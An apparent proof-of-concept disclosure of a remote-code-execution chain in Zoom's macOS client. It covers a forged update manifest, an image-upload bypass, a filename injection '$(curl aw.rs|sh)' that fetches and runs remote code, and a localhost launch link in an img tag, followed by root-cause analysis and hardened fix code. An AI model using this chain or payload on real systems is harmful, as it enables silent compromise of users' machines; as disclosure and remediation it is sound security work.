POC - https://youtu.be/zGSLBDo3N7s

- Create a malicious update manifest with the `Package-url` pointing to a server you control:

```
Check-sum=11111111111111111111111111111111;Check2-sum=11111111111111111111111111111111;Update-Option=1;Current-version=5.4.53932.0709;Download-root=https://aw.rs/z;Package-url=https://aw.rs/z/5.4.53932.0709/zoomusInstaller.pkg?t=atupg;Package-name=zoomusInstaller.pkg;Installer-name=;ahcab-name=airhost.zip;sipcab-name=sipcall.zip;codesnippet-name=codesnippet_mac.zip;fullcab-name=zoomusInstallerFull.pkg;
```

- Upload the manifest to a `.zoom.us` domain. One example is as the icon for a new https://marketplace.zoom.us/ app (there are client-side checks to see if it is an image, but they can be bypassed): https://marketplacecontent.zoom.us//sMLaMgPKSw2SAfIfpYV1Eg/zqJOtwryQkyO_UMykn2OdA/app/4yr1OelsSIGCMOj5CvI1JQ/ZAS3dFjlS8W0jJt48Dy9fA.jpg

- Use `.htaccess` (or any other method) to change the filename of the malicious package pointed to by `Package-url` in the manifest:

```
Header set Content-Disposition 'attachment; filename="aaaa$(curl aw.rs|sh).pkg"'
```

- Create a malicious link to hit the local Zoom web server. To bypass the domain checks it must be a valid subdomain of zoom.us and also end with `zoom.us`. This still allows us to create a link to our manifest hosted on marketplacecontent.zoom.us:

```
http://localhost:19421/launch?domain=marketplacecontent.zoom.us//sMLaMgPKSw2SAfIfpYV1Eg/zqJOtwryQkyO_UMykn2OdA/app/4yr1OelsSIGCMOj5CvI1JQ/ZAS3dFjlS8W0jJt48Dy9fA.jpg?.zoom.us
```

- Create an image with the link and host it somewhere:

```html
<img src="http://localhost:19421/launch?domain=marketplacecontent.zoom.us//sMLaMgPKSw2SAfIfpYV1Eg/zqJOtwryQkyO_UMykn2OdA/app/4yr1OelsSIGCMOj5CvI1JQ/ZAS3dFjlS8W0jJt48Dy9fA.jpg?.zoom.us">
```
The RCE is possible because the download URL is built with:

```objectivec
[NSString stringWithFormat:@"https://%@/upgrade?os=mac", domain]
```

This allows any link to be created; it just needs to be a valid subdomain (the host is checked on the generated URL) and also end with a valid subdomain.

After the manifest is downloaded, the package is downloaded and its signature is checked with:

```objectivec
// The filename is interpolated into a shell command string and then executed.
NSString *cmd = [NSString stringWithFormat:@"pkgutil --check-signature \"%@\"", filename];
[cmd runAsCommand];
```

This allows trivial command injection via a malicious filename.
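A hardened version of the two code paths quoted above, added here as an illustration and not Zoom's own code: the host is matched against an exact allow-list and the URL is rebuilt from parsed components instead of a format string, and the filename is handed to pkgutil as a separate argv element through NSTask rather than through a shell command string. The allow-list entries and the `expectedSigner` string are placeholders.

```objectivec
#import <Foundation/Foundation.h>

// Hardened URL construction. Rather than interpolating the caller-supplied
// domain into a format string and suffix-matching "zoom.us", parse it, require
// the host to be on an exact allow-list, and rebuild the URL from that host
// alone, so a smuggled "//path?.zoom.us" tail is discarded.
static NSURL *upgradeManifestURL(NSString *domain) {
    // Assumption: the real allow-list holds only the update server(s); hosts
    // that serve user-uploaded content (e.g. marketplacecontent.zoom.us) are
    // deliberately absent. The two entries below are placeholders.
    NSSet<NSString *> *allowedHosts =
        [NSSet setWithArray:@[ @"zoom.us", @"www.zoom.us" ]];
    NSURLComponents *probe = [NSURLComponents componentsWithString:
        [NSString stringWithFormat:@"https://%@", domain]];
    NSString *host = probe.host.lowercaseString;
    if (host == nil || ![allowedHosts containsObject:host]) {
        return nil;
    }
    NSURLComponents *c = [[NSURLComponents alloc] init];
    c.scheme = @"https";
    c.host = host;
    c.path = @"/upgrade";
    c.queryItems = @[ [NSURLQueryItem queryItemWithName:@"os" value:@"mac"] ];
    return c.URL;
}

// Hardened signature check. The filename is passed to pkgutil as a separate
// argv element, so quotes or "$(...)" in the name arrive as literal bytes and
// no shell ever parses them. expectedSigner is a placeholder for the line
// pkgutil prints for the legitimate signing identity.
static BOOL packageHasTrustedSignature(NSString *filename, NSString *expectedSigner) {
    NSTask *task = [[NSTask alloc] init];
    task.executableURL = [NSURL fileURLWithPath:@"/usr/sbin/pkgutil"];
    task.arguments = @[ @"--check-signature", filename ];
    NSPipe *pipe = [NSPipe pipe];
    task.standardOutput = pipe;
    task.standardError = pipe;
    NSError *error = nil;
    if (![task launchAndReturnError:&error]) {
        return NO;
    }
    NSData *data = [pipe.fileHandleForReading readDataToEndOfFile];
    [task waitUntilExit];
    NSString *report =
        [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding] ?: @"";
    // Require both a zero exit status and the expected signer line, so a package
    // carrying some other valid signature is still rejected.
    return task.terminationStatus == 0 && [report containsString:expectedSigner];
}
```

With this construction the `launch?domain=marketplacecontent.zoom.us//...?.zoom.us` input parses to host `marketplacecontent.zoom.us`, which is not on the allow-list, so no manifest URL is produced at all.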